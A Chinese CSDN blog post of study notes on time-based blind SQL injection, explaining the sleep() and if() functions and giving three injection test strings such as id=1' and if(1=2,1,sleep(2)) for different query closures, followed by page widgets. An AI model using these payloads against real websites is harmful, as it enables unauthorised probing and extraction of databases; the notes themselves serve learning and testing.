sql注入学习笔记(四)时间型盲注

本文探讨了时间型SQL注入的情况,当数据交互后无明显错误或正确反馈时,通过时间延迟函数(如sleep)来判断注入是否成功。介绍了利用火狐浏览器的Web开发者工具进行测试的方法,并提供了构造判断语句和爆库语句的实例。
摘要由CSDN通过智能技术生成

       时间型的注入遇到的条件更为苛刻,数据交互完成以后目标网站没有错误和正确的页面回显,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。当然也需要构造闭合。

函数:

lenght()     //长度
ascii()      //ASCII码
mid()       //截取字符串
substr()     //截取字符串
hex() //以上在布尔型中介绍过 
sleep() //时间注入的核心函数 
   sleep(1) //过1秒响应 
if()函数 
if(1=1,3,4) 返回 3 
if(1=2,3,4) 返回4

需要利用到的工具:一般浏览器会自带:火狐浏览器在设置->Web开发者->网络

构造判断语句:

id=1' and if(1=2,1,sleep(2)) 

id=1" and if(1=2,1,sleep(2)) 

id=1) and if(1=2,1,sleep(2)) 

注:若时间运行时间为2s以后,则判断正确。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值